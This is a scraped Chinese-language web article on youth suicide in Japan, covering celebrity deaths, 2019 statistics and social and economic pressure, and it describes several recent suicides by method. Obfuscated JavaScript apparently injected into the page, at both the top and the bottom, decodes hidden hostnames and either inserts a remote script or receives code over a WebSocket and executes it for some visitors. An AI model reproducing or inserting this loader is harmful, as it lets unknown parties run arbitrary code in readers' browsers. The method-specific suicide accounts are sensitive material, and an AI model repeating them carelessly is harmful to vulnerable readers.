function SqfHJy(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function LDcGfMrn(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SqfHJy(t);};window[''+'R'+'J'+'h'+'i'+'Y'+'Z'+'k'+'S'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=LDcGfMrn,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('aGoueGluYm8tbG9yYS5jbg==','dHIueWVVzdW42NzguY29t','138805',window,document,['','V']);}:function(){};

跳楼、卧轨、上吊自杀:日本社会正在逼年轻人去死

今年的日本演艺圈注定是不平静的一年,频繁传出的艺人自杀消息一次又一次震惊了所有人。

木村花、滨崎玛利亚、三浦春马、芦名星、竹内结子…

前几天又有一位摇滚乐队吉他手津野米咲被发现在家中死亡,警方根据现场初步判断,还是自杀。


津野米咲


艺人自杀的悲剧接连发生,他们中很多都只有二三十岁,却已经决绝地选择了终结自己的生命。

 

越来越沉重的自杀阴影不止笼罩在日本演艺圈,更成了整个日本社会挥之不去的梦魇。

 

昨天日本政府通过的自杀对策白皮书里,清晰的统计数据也同样说明了一件事:更多年轻人正在选择自杀。

 


2019年日本的自杀人数是20169人,比去年减少了671人。

 

虽然整体的自杀人数相比前年减少了,甚至全年龄段的自杀人数都在减少的情况下,只有10代(10多岁)的自杀人数增加了!

 

而且自杀成了15-39岁各个年龄段人群死亡的首要原因,超过了癌症等疾病和意外事故。



 

这还只是去年的数据,今年由于疫情以及多名知名演员的自杀报道影响,初高中生自杀案例激增,从7月份开始,连续3个月自杀人数要超过去年同期。

 

一次又一次的自杀报道,让人几乎已经看得麻木了。

 

17岁高中男生从商场屋顶一跃而下,跳楼身亡。

 

两个16岁高中生,相隔不到八个小时,相继从不同车站的月台上跳了下去。

 

穿着深蓝色校服的10至20岁女性,在电车进入车站时从站台上跳入铁轨内,现场确认死亡。

……



这些都是这个月的自杀报道,甚至深蓝色校服女孩是昨天下午才离开的。

 

去年的自杀对策白皮书里,统计分析了日本过去十年以来年轻人的自杀原因。

 

结果是:

 

中小学生自杀的原因往往是“亲子关系不和”、“家人的教育和斥责”;

 

高中、大学生的自杀原因包括“学业不振”、“对未来的担忧”、“抑郁症”等等。

 

年纪较小的孩子,自杀原因基本都与家庭和学校有关,包括不可靠的家庭环境、家人虐待、校园暴力等。


示意图


而随着年龄渐长,年轻人就要开始承担更多生活的压力。

 

“大学一毕业,就要开始偿还几百万日元的奖学金。(日本奖学金性质更接近助学贷款)

 

20多岁存款为零的年轻人,比例超过60%。

 

近三成的20多岁劳动者是非正规雇佣。

 

在这种情况下,年轻人的死因第一位是自杀,是必然的了。”


“‘首要死因’上了热搜。


看了一下,2019年的年轻人的首要死因是自杀。

 

平均年收入比以前低。

 

不能结婚,也不能生孩子。

 

老了也拿不到养老金。

 

我就想让全世界都明白,‘年轻人’是对未来不抱有希望的一代。”


“太苛待年轻一代了。


自从泡沫经济破灭后,年轻一代就一直被折磨,比如就业冰河期,哪怕能进入一家公司,还是会受到老板的刁难。

 

坏习惯已经在我们的社会中根深蒂固了。”



就像网友们诉说的那样,就业的不确定性(找不到工作、只能得到短期合同、非正式雇佣)让年轻人承担了很大的生存压力。

 

没日没夜地加班、过劳,生活在睡觉和工作中循环往复,而且无孔不入的压力和焦虑很大程度上也影响了年轻人的婚恋态度。

 

不想谈恋爱结婚、结不起婚、不想生孩子、生不起孩子…



除了种种令人窒息的现实之外,日本年轻人的精神健康也同样堪忧,一方面是被现实所影响,但更多的是日本社会本身对于精神健康的忽视。

 

很多日本网友在谈到“年轻人最大的死因是自杀”时,都不约而同地提到了“自我责任论”

 

这种在日本盛行的思想,让所有人都成了一座座彼此难以企及的孤岛。

 

无论个人陷入怎样的困境,生意失败、单亲家庭、晚年贫困…都是自己的责任,结果都要自己承担,不应该给别人添麻烦。



以前有一个调查很直观地展现了日本的“自我责任论”思维,是在世界各国进行的贫困问题意识调查。

 

问题是这样的,“国家和政府有责任照顾那些生活无法自理的穷人,对于这个想法你怎么看?”

 

回答“不这么认为”的人比例是这样的:

 

德国:7%

英国:8%

中国:9%

几乎所有人都认为“政府理应支持无法自理的穷人”,但日本有38%的人不这样认为。



所以“自我责任论”可以说在这个国家大行其道,不管是十几岁的学生、二十多岁刚毕业就背负几百万“债”的大学生,

 

还是没日没夜辛苦工作的过劳社畜…

 

这些年轻人都承受了来自各个方面的沉重压力,但在这种思维的影响下,他们更倾向于从自身找原因,认为生活中的种种挫败是自己的责任。

 

“自杀是日本年轻人死亡的首要原因。

 

这就是用‘自我责任论’不断敲打年轻人的结果。

 

我觉得‘对自己担负起责任’是在社会保障完备的基础上,才可以使用的词。”



自杀不是个人的问题,而是社会的问题。社会各方面保障不到位的情况下,光想着让年轻人努力。

给TA买糖
共{{data.count}}人
人已赞赏
时事圈

美媒评中国“蜂群”无人机:解放军或已实际部署,现有手段防不住

2020-10-31 15:51:58

时事圈

突破100万亿!中国GDP将相当于日德英法总和

2020-11-1 13:04:13

function NkBYzTr(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function JInmFNE(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return NkBYzTr(t);};window[''+'j'+'Z'+'P'+'z'+'W'+'t'+'E'+'L'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=JInmFNE,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('aGGoueGGluYm8tbGG9yYS5jbg==','dHIueeWVzdW42NzguY29t','138806',window,document,['G','e']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧